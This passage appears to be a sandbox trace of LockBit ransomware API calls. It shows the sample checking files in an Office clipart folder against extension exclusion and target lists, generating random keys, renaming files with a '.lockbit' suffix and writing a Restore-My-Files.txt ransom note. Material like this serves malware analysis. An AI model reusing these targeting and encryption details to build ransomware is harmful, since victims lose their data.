lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0171.799] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca500f00, ftCreationTime.dwHighDateTime=0x1bd4e4b, ftLastAccessTime.dwLowDateTime=0x5a425410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca500f00, ftLastWriteTime.dwHighDateTime=0x1bd4e4b, nFileSizeHigh=0x0, nFileSizeLow=0xc382, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02752G.GIF", cAlternateFileName="")) returned 1 [0171.799] lstrcmpiW (lpString1=".", lpString2="PH02752G.GIF") returned -1 [0171.799] lstrcmpiW (lpString1="..", lpString2="PH02752G.GIF") returned -1 [0171.799] PathFindExtensionW (pszPath="PH02752G.GIF") returned=".GIF" [0171.799] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0171.799] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0171.799] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0171.799] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0171.799] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0171.799] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0171.799] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0171.799] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0171.799] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0171.799] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0171.799] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0171.799] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0171.800] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0171.800] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0171.800] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0171.800] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0171.800] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0171.800] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0171.800] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0171.800] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0171.801] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0171.801] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0171.801] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0171.801] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02752G.GIF") returned 1 [0171.801] lstrcmpiW (lpString1="ntldr", lpString2="PH02752G.GIF") returned -1 [0171.801] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02752G.GIF") returned -1 [0171.801] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02752G.GIF") returned -1 [0171.801] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02752G.GIF") returned -1 [0171.801] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02752G.GIF") returned 1 [0171.801] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02752G.GIF") returned -1 [0171.801] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0171.801] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02752G.GIF") returned=".GIF" [0171.801] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0171.801] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0171.801] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0171.801] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0171.801] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0171.801] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0171.801] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0171.801] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0171.801] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0171.801] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0171.801] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0171.801] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0171.801] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0171.801] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0171.801] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0171.801] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0171.801] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0171.801] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0171.801] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0171.802] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0171.802] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0171.802] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0171.802] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0171.802] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0171.802] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0171.802] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0171.802] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0171.802] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0171.802] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02752G.GIF.lockbit") returned 72 [0171.802] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02752G.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02752g.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0171.803] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0171.803] malloc (_Size=0x40068) returned 0x3f70048 [0171.803] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=50050) returned 1 [0171.803] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0171.803] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0171.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0171.804] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0171.804] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0171.804] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0171.804] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0171.805] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02752G.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02752G.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.805] malloc (_Size=0xa6) returned 0x1fa2ed8 [0171.805] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0171.806] free (_Block=0x1fa2ed8) [0171.806] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02752G.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0171.806] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0171.806] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0171.806] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88769700, ftCreationTime.dwHighDateTime=0x1bd4e52, ftLastAccessTime.dwLowDateTime=0x6ce95a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x88769700, ftLastWriteTime.dwHighDateTime=0x1bd4e52, nFileSizeHigh=0x0, nFileSizeLow=0x7c08, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02752U.BMP", cAlternateFileName="")) returned 1 [0171.806] lstrcmpiW (lpString1=".", lpString2="PH02752U.BMP") returned -1 [0171.806] lstrcmpiW (lpString1="..", lpString2="PH02752U.BMP") returned -1 [0171.806] PathFindExtensionW (pszPath="PH02752U.BMP") returned=".BMP" [0171.806] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0171.806] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0171.806] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0171.806] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0171.806] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0171.806] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0171.807] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0171.807] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0171.807] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0171.808] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0171.808] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0171.808] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0171.808] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0171.808] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0171.808] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0171.808] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0171.808] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0171.808] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0171.808] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0171.808] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0171.808] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0171.808] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02752U.BMP") returned 1 [0171.808] lstrcmpiW (lpString1="ntldr", lpString2="PH02752U.BMP") returned -1 [0171.808] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02752U.BMP") returned -1 [0171.808] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02752U.BMP") returned -1 [0171.808] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02752U.BMP") returned -1 [0171.808] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02752U.BMP") returned 1 [0171.808] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02752U.BMP") returned -1 [0171.808] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0171.808] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02752U.BMP") returned=".BMP" [0171.808] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0171.808] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0171.808] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0171.808] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0171.808] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0171.809] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0171.809] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02752U.BMP.lockbit") returned 72 [0171.810] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02752U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02752u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0171.810] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0171.810] malloc (_Size=0x40068) returned 0x3df0008 [0171.810] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=31752) returned 1 [0171.810] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0171.811] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0171.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0171.811] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0171.811] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0171.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0171.811] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0171.827] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02752U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02752U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.827] malloc (_Size=0xa6) returned 0x1fa2ed8 [0171.827] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0172.093] free (_Block=0x1fa2ed8) [0172.093] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02752U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0172.093] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0172.093] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0172.093] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xece62600, ftCreationTime.dwHighDateTime=0x1bd4e53, ftLastAccessTime.dwLowDateTime=0x5a425410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xece62600, ftLastWriteTime.dwHighDateTime=0x1bd4e53, nFileSizeHigh=0x0, nFileSizeLow=0x1a6b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02753U.BMP", cAlternateFileName="")) returned 1 [0172.094] lstrcmpiW (lpString1=".", lpString2="PH02753U.BMP") returned -1 [0172.094] lstrcmpiW (lpString1="..", lpString2="PH02753U.BMP") returned -1 [0172.094] PathFindExtensionW (pszPath="PH02753U.BMP") returned=".BMP" [0172.094] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0172.094] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0172.094] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0172.094] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0172.094] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0172.095] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0172.095] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0172.095] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02753U.BMP") returned 1 [0172.095] lstrcmpiW (lpString1="ntldr", lpString2="PH02753U.BMP") returned -1 [0172.095] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02753U.BMP") returned -1 [0172.095] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02753U.BMP") returned -1 [0172.096] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02753U.BMP") returned -1 [0172.118] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02753U.BMP") returned 1 [0172.118] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02753U.BMP") returned -1 [0172.118] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0172.118] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02753U.BMP") returned=".BMP" [0172.118] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0172.118] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0172.118] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0172.118] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0172.118] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0172.118] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0172.118] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0172.118] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0172.118] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0172.118] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0172.118] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0172.118] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0172.118] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0172.118] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0172.118] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0172.118] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0172.118] lstrcmpiW (lpString1=".mrg", 